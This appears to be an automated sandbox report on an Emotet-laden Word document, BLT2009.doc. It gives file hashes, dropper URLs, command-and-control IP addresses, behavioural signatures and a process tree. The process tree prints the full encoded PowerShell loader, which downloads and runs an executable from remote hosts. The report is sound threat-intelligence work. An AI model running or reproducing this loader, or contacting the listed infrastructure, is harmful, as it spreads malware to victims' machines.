Analysis

  • max time kernel
    67s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    19-09-2020 13:06

General

  • Target

    BLT2009.doc

  • Size

    163KB

  • MD5

    3bed1986a9ac94fba68c471fb4bcfc20

  • SHA1

    9b8a01bc85ac72c25311bb8b934be6071ffedeb9

  • SHA256

    24750ed2a7cbc122fca96df6f6ed3a3b879906272abbbcc636db5a6a441f68d2

  • SHA512

    7f9870114bb40a322b3013053505319774d04f20a11840b391c4a668c84f285ccc5ca2df5ad201d6bd7263434483bb7cdb49fadaed74626dfa9625fbeb86617b

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://dheeranet.com/Pej/

exe.dropper

http://playschoolmatritva.com/cgi-bin/Uh/

exe.dropper

http://dikshadayal.com/cgi-bin/Zl78esq/

exe.dropper

http://new.mylicense.ca/5aiibj/vS2/

exe.dropper

http://nucleokardecistalace.org.br/wp-includes/HviA/

exe.dropper

http://britanniacricketleague.com/wp-admin/3qc8lQB/

exe.dropper

https://www.hhbiao.com/ro/4Kh/

Extracted

Family

emotet

C2

71.72.196.159:80

134.209.36.254:8080

120.138.30.150:8080

94.23.216.33:80

157.245.99.39:8080

137.59.187.107:8080

94.23.237.171:443

61.19.246.238:443

156.155.166.221:80

50.35.17.13:80

153.137.36.142:80

91.211.88.52:7080

209.141.54.221:8080

185.94.252.104:443

174.45.13.118:80

87.106.136.232:8080

62.75.141.82:80

213.196.135.145:80

188.219.31.12:80

82.80.155.43:80

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 8 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\BLT2009.doc"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1496
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -encod JABNAHUAcQB4AGoAcwBiAD0AKAAoACcAQwAnACsAJwBiADEAJwApACsAKAAnAG0ANwAnACsAJwBfADAAJwApACkAOwAmACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABlAG4AVgA6AHUAcwBlAHIAcABSAE8AZgBJAEwAZQBcAEQARgBiAHEAbQBLADUAXABBAF8AagB6ADQATwA1AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQByAEUAQwB0AE8AcgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBVAGAAUgBgAEkAdABZAHAAcgBgAE8AYABUAE8AQwBPAGwAIgAgAD0AIAAoACcAdABsACcAKwAnAHMAMQAnACsAJwAyACcAKwAoACcALAAgAHQAbAAnACsAJwBzADEAMQAnACsAJwAsACAAdAAnACkAKwAnAGwAcwAnACkAOwAkAEsAagA5ADcAbwBiAGsAIAA9ACAAKAAoACcASwAnACsAJwB2AGMAJwApACsAKAAnADIAZwBkACcAKwAnAG4AJwApACkAOwAkAEMANQBfADUAagBpADUAPQAoACcATAAnACsAJwBfAHAAJwArACgAJwA1ACcAKwAnAHYAeQBnACcAKQApADsAJABMADgAMQBfADUAcwA4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHQAOQAnACsAKAAnADEAJwArACcARABmAGIAcQAnACkAKwAnAG0AawAnACsAKAAnADUAJwArACcAdAA5ADEAQQAnACsAJwBfACcAKQArACgAJwBqAHoAJwArACcANABvACcAKwAnADUAdAA5ACcAKQArACcAMQAnACkALQBDAHIAZQBwAGwAYQBjAEUAKAAnAHQAJwArACcAOQAxACcAKQAsAFsAYwBIAEEAUgBdADkAMgApACsAJABLAGoAOQA3AG8AYgBrACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABDAHkAbgBsAHYAcgBiAD0AKAAoACcAQQA4AGoAaAAnACsAJwBtAGMAJwApACsAJwAzACcAKQA7ACQARQBhAGoANwB0ADAAcgA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBFAHQALgB3AEUAYgBjAGwASQBFAE4AdAA7ACQAWABhAHkAZAB3ADQANgA9ACgAKAAnAGgAdAAnACsAJwB0AHAAOgAnACkAKwAnAC8ALwAnACsAKAAnAGQAJwArACcAaABlAGUAcgBhAG4AZQAnACkAKwAoACcAdAAnACsAJwAuAGMAJwApACsAJwBvACcAKwAoACcAbQAvACcAKwAnAFAAJwApACsAKAAnAGUAagAvACcAKwAnACoAaAAnACkAKwAoACcAdAB0ACcAKwAnAHAAOgAnACkAKwAnAC8ALwAnACsAKAAnAHAAbABhACcAKwAnAHkAcwBjACcAKQArACgAJwBoAG8AJwArACcAbwBsAG0AYQB0AHIAJwArACcAaQAnACkAKwAoACcAdAB2AGEAJwArACcALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AJwArACcAYwBnAGkAJwArACcALQBiAGkAbgAvACcAKQArACcAVQAnACsAKAAnAGgAJwArACcALwAqAGgAJwApACsAJwB0ACcAKwAoACcAdAAnACsAJwBwADoAJwApACsAKAAnAC8ALwBkACcAKwAnAGkAawAnACkAKwAoACcAcwBoAGEAJwArACcAZABhACcAKQArACgAJwB5AGEAJwArACcAbAAuAGMAJwApACsAKAAnAG8AJwArACcAbQAnACsAJwAvAGMAZwBpAC0AJwApACsAKAAnAGIAaQAnACsAJwBuAC8AWgAnACkAKwAoACcAbAA3ADgAJwArACcAZQBzACcAKQArACgAJwBxAC8AKgBoAHQAJwArACcAdABwADoALwAnACsAJwAvAG4AJwApACsAKAAnAGUAJwArACcAdwAuAG0AJwArACcAeQBsAGkAJwApACsAKAAnAGMAJwArACcAZQBuACcAKQArACgAJwBzACcAKwAnAGUALgBjAGEAJwApACsAKAAnAC8ANQAnACsAJwBhACcAKQArACgAJwBpACcAKwAnAGkAYgAnACkAKwAoACcAagAvAHYAUwAnACsAJwAyAC8AKgAnACsAJwBoAHQAdAAnACsAJwBwADoAJwApACsAKAAnAC8AJwArACcALwBuACcAKQArACcAdQBjACcAKwAoACcAbAAnACsAJwBlAG8AJwApACsAJwBrAGEAJwArACgAJwByAGQAZQBjAGkAJwArACcAcwB0ACcAKwAnAGEAbABhACcAKwAnAGMAJwApACsAKAAnAGUAJwArACcALgBvACcAKQArACgAJwByAGcALgAnACsAJwBiAHIAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgAnACsAJwBjAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8ASAAnACsAJwB2ACcAKwAoACcAaQBBACcAKwAnAC8AJwApACsAKAAnACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAOgAnACsAJwAvAC8AJwApACsAKAAnAGIAJwArACcAcgBpACcAKQArACgAJwB0ACcAKwAnAGEAbgAnACkAKwAoACcAbgBpACcAKwAnAGEAYwAnACkAKwAoACcAcgAnACsAJwBpAGMAawBlAHQAJwApACsAJwBsACcAKwAoACcAZQBhAGcAdQBlAC4AYwBvAG0AJwArACcALwAnACsAJwB3ACcAKwAnAHAALQBhAGQAbQBpACcAKwAnAG4AJwApACsAJwAvACcAKwAnADMAcQAnACsAKAAnAGMAJwArACcAOABsACcAKQArACgAJwBRAEIAJwArACcALwAqAGgAJwArACcAdAB0AHAAJwApACsAKAAnAHMAJwArACcAOgAvAC8AdwB3AHcAJwApACsAKAAnAC4AaABoAGIAaQBhACcAKwAnAG8ALgBjAG8AJwArACcAbQAvACcAKQArACcAcgAnACsAKAAnAG8ALwA0ACcAKwAnAEsAaAAnACkAKwAnAC8AJwApAC4AIgBzAFAAbABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEUAbAB1AHAAcwBoAGUAPQAoACcARwAxACcAKwAoACcAOAAnACsAJwA3AHUAZgAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQASgAxAF8AaAA3AGkAdQAgAGkAbgAgACQAWABhAHkAZAB3ADQANgApAHsAdAByAHkAewAkAEUAYQBqADcAdAAwAHIALgAiAGQAbwBXAG4ATABgAE8AYABBAEQAZgBgAEkAbABlACIAKAAkAEoAMQBfAGgANwBpAHUALAAgACQATAA4ADEAXwA1AHMAOAApADsAJABMAHAAeAB0ADEAYwB1AD0AKAAnAFUAOQAnACsAKAAnADUAbQAwACcAKwAnAHcAJwApACsAJwB4ACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABMADgAMQBfADUAcwA4ACkALgAiAGwAYABFAG4AYABnAHQAaAAiACAALQBnAGUAIAAyADcANAA0ADQAKQAgAHsALgAoACcASQAnACsAJwBuACcAKwAnAHYAbwBrACcAKwAnAGUALQBJAHQAZQBtACcAKQAoACQATAA4ADEAXwA1AHMAOAApADsAJABBAHgAawBkADIAZgA3AD0AKAAoACcATQBjACcAKwAnADcAJwApACsAKAAnAHUAZwAnACsAJwByACcAKQArACcANwAnACkAOwBiAHIAZQBhAGsAOwAkAE4AMwA5AHAAaQB5AGUAPQAoACcAWQAnACsAJwB5ACcAKwAoACcAdgBvACcAKwAnADQAOAB4ACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABOAHgAdQBzAHIAeQB6AD0AKAAnAFQAXwAnACsAKAAnAGkAJwArACcAXwB5AGIAJwApACsAJwB3ACcAKQA=
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1664
    • C:\Users\Admin\Dfbqmk5\A_jz4o5\Kvc2gdn.exe
      "C:\Users\Admin\Dfbqmk5\A_jz4o5\Kvc2gdn.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      PID:304
      • C:\Windows\SysWOW64\PlaySndSrv\aaclient.exe
        "C:\Windows\SysWOW64\PlaySndSrv\aaclient.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:552

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\DFbqmK5\A_jz4O5\Kvc2gdn.exe
  • C:\Users\Admin\Dfbqmk5\A_jz4o5\Kvc2gdn.exe
  • C:\Windows\SysWOW64\PlaySndSrv\aaclient.exe
  • memory/304-14-0x00000000002D0000-0x00000000002E2000-memory.dmp
    Filesize

    72KB

  • memory/304-15-0x0000000000240000-0x0000000000250000-memory.dmp
    Filesize

    64KB

  • memory/304-12-0x0000000000000000-mapping.dmp
  • memory/552-20-0x00000000001E0000-0x00000000001F0000-memory.dmp
    Filesize

    64KB

  • memory/552-19-0x00000000001C0000-0x00000000001D2000-memory.dmp
    Filesize

    72KB

  • memory/552-17-0x0000000000000000-mapping.dmp
  • memory/1496-4-0x00000000070C0000-0x00000000072C0000-memory.dmp
    Filesize

    2.0MB

  • memory/1496-2-0x0000000008C10000-0x0000000008C14000-memory.dmp
    Filesize

    16KB

  • memory/1664-7-0x000000001AB50000-0x000000001AB51000-memory.dmp
    Filesize

    4KB

  • memory/1664-11-0x000000001C2F0000-0x000000001C2F1000-memory.dmp
    Filesize

    4KB

  • memory/1664-10-0x000000001B860000-0x000000001B861000-memory.dmp
    Filesize

    4KB

  • memory/1664-9-0x00000000022E0000-0x00000000022E1000-memory.dmp
    Filesize

    4KB

  • memory/1664-8-0x000000001AA60000-0x000000001AA61000-memory.dmp
    Filesize

    4KB

  • memory/1664-6-0x0000000002380000-0x0000000002381000-memory.dmp
    Filesize

    4KB

  • memory/1664-5-0x000007FEE95F0000-0x000007FEE9FDC000-memory.dmp
    Filesize

    9.9MB

  • memory/1672-21-0x000007FEF5310000-0x000007FEF558A000-memory.dmp
    Filesize

    2.5MB